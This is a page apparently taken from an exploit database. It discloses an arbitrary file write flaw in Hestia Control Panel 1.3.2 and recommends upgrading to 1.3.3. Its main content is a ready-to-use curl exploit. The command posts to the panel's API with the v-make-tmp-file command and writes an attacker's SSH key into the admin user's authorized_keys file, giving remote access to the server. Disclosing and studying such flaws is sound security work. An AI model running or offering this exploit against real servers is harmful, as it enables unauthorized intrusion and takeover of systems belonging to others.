header-logo
Suggest Exploit
vendor:
Hestia Control Panel
by:
Numan Türle
8.8
CVSS
HIGH
Arbitrary File Write
264
CWE
Product Name: Hestia Control Panel
Affected Version From: < 1.3.3
Affected Version To: 1.3.2
Patch Exists: YES
Related CWE: N/A
CPE: a:hestiacp:hestia_control_panel
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: HestiaCP Version 1.3.2
2021

Hestia Control Panel 1.3.2 – Arbitrary File Write

Hestia Control Panel version 1.3.2 is vulnerable to an arbitrary file write vulnerability. An attacker can exploit this vulnerability by sending a specially crafted POST request to the /api/index.php endpoint with the v-make-tmp-file command and the path of the file to be written. This can be used to write an SSH key to the authorized_keys file, allowing the attacker to gain access to the server.

Mitigation:

Upgrade to Hestia Control Panel version 1.3.3 or later.
Source

Exploit-DB raw data:

# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write
# Date: 07.03.2021
# Author: Numan Türle
# Vendor Homepage: https://hestiacp.com/
# Software Link: https://github.com/hestiacp/hestiacp
# Version: < 1.3.3
# Tested on: HestiaCP Version 1.3.2

curl --location --request POST 'https://TARGET:8083/api/index.php' \
--form 'hash="HERE_API_KEY"' \
--form 'returncode="yes"' \
--form 'cmd="v-make-tmp-file"' \
--form 'arg1="ssh-rsa HERE_KEY"' \
--form 'arg2="/home/admin/.ssh/authorized_keys"' \
--form 'arg3=""' \
--form 'arg4=""' \
--form 'arg5=""'

Navigation

Suggest Exploit

Services By CQR